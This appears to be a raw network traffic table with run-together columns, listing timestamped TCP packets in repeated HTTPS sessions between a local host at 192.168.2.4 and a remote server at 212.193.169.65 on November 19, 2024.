                                                                                                                                Nov 19, 2024 18:56:45.727834940 CET44350118212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:46.446964979 CET44350118212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:46.447037935 CET50118443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:46.448410034 CET50118443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:46.448424101 CET44350118212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:46.448668003 CET44350118212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:46.449448109 CET50118443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:46.449712038 CET50118443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:46.449740887 CET44350118212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:46.449799061 CET50118443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:46.449837923 CET44350118212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:46.449866056 CET44350118212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:46.449896097 CET50118443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:46.449923992 CET50118443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:46.456825018 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:46.456909895 CET44350121212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:46.456986904 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:46.457854986 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:46.457894087 CET44350121212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.261342049 CET44350121212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.261415958 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.262825012 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.262845039 CET44350121212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.263111115 CET44350121212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.263757944 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.264012098 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.264054060 CET44350121212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.264112949 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.264164925 CET44350121212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.264192104 CET44350121212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.264238119 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.264254093 CET50121443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.272670984 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.272705078 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:47.272764921 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.273211956 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:47.273221970 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.073738098 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.073843956 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.076316118 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.076323986 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.076559067 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.083719015 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.084135056 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.084153891 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.084235907 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.084254980 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.084310055 CET44350124212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.084331989 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.084357023 CET50124443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.126015902 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.126034021 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.126159906 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.126599073 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.126610041 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.929414034 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.929500103 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.930986881 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.930995941 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.931849003 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.933034897 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.934429884 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.934457064 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.934582949 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.934607983 CET44350127212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:48.934668064 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:48.934755087 CET50127443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.059820890 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.059890985 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.059967995 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.060822964 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.060841084 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.804972887 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.805052996 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.806518078 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.806526899 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.806767941 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.807356119 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.808454990 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.808487892 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.808567047 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.808587074 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.808618069 CET44350130212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.808635950 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.808666945 CET50130443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.820394993 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.820461035 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:49.820528984 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.821043015 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:49.821079969 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.649952888 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.650041103 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.651292086 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.651328087 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.651731014 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.652354002 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.652594090 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.652642012 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.652703047 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.652812958 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.652857065 CET44350133212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.652915001 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.653068066 CET50133443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.660681963 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.660732985 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:50.660798073 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.661150932 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:50.661165953 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.368794918 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.368874073 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.370126009 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.370132923 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.370392084 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.371476889 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.371707916 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.371733904 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.371776104 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.371819973 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.371848106 CET44350136212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.371891975 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.371908903 CET50136443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.378391027 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.378417015 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:51.378768921 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.379244089 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:51.379259109 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.088717937 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.088797092 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.090204000 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.090213060 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.090460062 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.091175079 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.091442108 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.091474056 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.091571093 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.091594934 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.091599941 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.091612101 CET44350139212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.091639996 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.091670990 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.091732025 CET50139443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.106249094 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.106285095 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.106435061 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.107271910 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.107287884 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.904845953 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.905117035 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.906124115 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.906136036 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.906466961 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.907533884 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.907533884 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.907618046 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.907630920 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.907768011 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.907803059 CET44350142212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.907892942 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.907892942 CET50142443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.914657116 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.914706945 CET44350145212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:52.914880991 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.915148020 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:52.915169001 CET44350145212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:53.735249043 CET44350145212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:53.735338926 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:53.736663103 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:53.736668110 CET44350145212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:53.736991882 CET44350145212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:53.737632990 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:53.743232012 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:53.743282080 CET44350145212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:53.743408918 CET44350145212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:53.743438005 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:53.743447065 CET44350145212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:53.743453979 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:53.743463039 CET44350145212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:53.743488073 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:53.743500948 CET50145443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:53.908278942 CET50148443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:53.908363104 CET44350148212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:53.908574104 CET50148443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:53.909046888 CET50148443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:53.909084082 CET44350148212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:54.715979099 CET44350148212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:54.716239929 CET50148443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:54.717617035 CET50148443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:54.717628956 CET44350148212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:54.717959881 CET44350148212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:54.718874931 CET50148443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:54.718874931 CET50148443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:54.718955994 CET44350148212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:54.719060898 CET50148443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:54.719090939 CET44350148212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:54.719124079 CET44350148212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:54.719186068 CET50148443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:54.719227076 CET50148443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:54.726907015 CET50151443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:54.726936102 CET44350151212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:54.727041960 CET50151443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:54.729651928 CET50151443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:54.729669094 CET44350151212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:55.551881075 CET44350151212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:55.552048922 CET50151443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:55.553450108 CET50151443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:55.553472996 CET44350151212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:55.553905010 CET44350151212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:55.554785013 CET50151443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:55.555975914 CET50151443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:55.556037903 CET44350151212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:55.556205988 CET44350151212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:55.556241989 CET44350151212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:55.556322098 CET50151443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:55.556587934 CET50151443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:55.587812901 CET50154443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:55.587866068 CET44350154212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:55.587945938 CET50154443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:55.588710070 CET50154443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:55.588720083 CET44350154212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:56.702127934 CET44350154212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:56.702205896 CET50154443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:56.703540087 CET50154443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:56.703547001 CET44350154212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:56.703896999 CET44350154212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:56.704566956 CET50154443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:56.705071926 CET50154443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:56.705105066 CET44350154212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:56.705152988 CET50154443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:56.705235958 CET44350154212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:56.705269098 CET44350154212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:56.705351114 CET50154443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:56.705365896 CET50154443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:56.731515884 CET50157443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:56.731556892 CET44350157212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:56.731664896 CET50157443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:56.732089996 CET50157443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:56.732105017 CET44350157212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:57.540194035 CET44350157212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:57.540328026 CET50157443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:57.541651964 CET50157443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:57.541668892 CET44350157212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:57.542449951 CET44350157212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:57.543096066 CET50157443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:57.544087887 CET50157443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:57.544138908 CET44350157212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:57.544281006 CET44350157212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:57.544317007 CET44350157212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:57.544363022 CET50157443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:57.544394016 CET50157443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:57.659272909 CET50160443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:57.659336090 CET44350160212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:57.659413099 CET50160443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:57.659914970 CET50160443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:57.659930944 CET44350160212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:58.452922106 CET44350160212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:58.453041077 CET50160443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:58.459435940 CET50160443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:58.459460974 CET44350160212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:58.459912062 CET44350160212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:58.469902039 CET50160443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:58.469902039 CET50160443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:58.469985008 CET44350160212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:58.470140934 CET44350160212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:58.470166922 CET44350160212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:58.471642017 CET50160443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:58.972129107 CET50160443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:59.001977921 CET50163443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:59.002017975 CET44350163212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:59.002156019 CET50163443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:59.002604961 CET50163443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:59.002616882 CET44350163212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:59.815815926 CET44350163212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:59.815901995 CET50163443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:59.817210913 CET50163443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:59.817219019 CET44350163212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:59.817543983 CET44350163212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:59.818080902 CET50163443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:59.818428993 CET50163443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:59.818459988 CET44350163212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:59.818576097 CET44350163212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:59.818604946 CET44350163212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:59.818733931 CET50163443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:59.818733931 CET50163443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:59.898742914 CET50166443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:59.898785114 CET44350166212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:59.898880005 CET50166443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:59.899276018 CET50166443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:59.899286032 CET44350166212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:00.712418079 CET44350166212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:00.712492943 CET50166443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:00.713695049 CET50166443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:00.713706017 CET44350166212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:00.714065075 CET44350166212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:00.714634895 CET50166443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:00.714838982 CET50166443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:00.714873075 CET44350166212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:00.715017080 CET44350166212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:00.715029001 CET50166443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:00.715058088 CET44350166212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:00.715060949 CET50166443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:00.715111971 CET50166443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:00.773304939 CET50169443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:00.773344040 CET44350169212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:00.773427963 CET50169443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:00.773967028 CET50169443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:00.773981094 CET44350169212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:01.585009098 CET44350169212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:01.585073948 CET50169443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:01.586671114 CET50169443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:57:01.586678982 CET44350169212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:01.586935997 CET44350169212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:57:01.587656975 CET50169443192.168.2.4212.193.169.65
